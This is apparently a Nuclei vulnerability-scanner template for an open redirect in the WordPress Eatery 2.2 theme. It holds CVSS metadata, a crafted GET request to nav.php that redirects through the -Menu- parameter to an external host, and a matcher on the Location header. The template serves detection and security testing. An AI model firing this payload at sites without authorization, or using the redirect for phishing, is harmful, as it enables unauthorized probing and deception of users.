id: eatery-restaurant-open-redirect

info:
  name: WordPress Eatery 2.2 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: |
    WordPress Eatery theme 2.2 contains an open redirect vulnerability. The theme accepts a user-controlled input that specifies a link to an external site. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://cxsecurity.com/issue/WLB-2020030183
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  tags: wordpress,wp-theme,redirect,wp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

# Enhanced by md on 2022/10/18
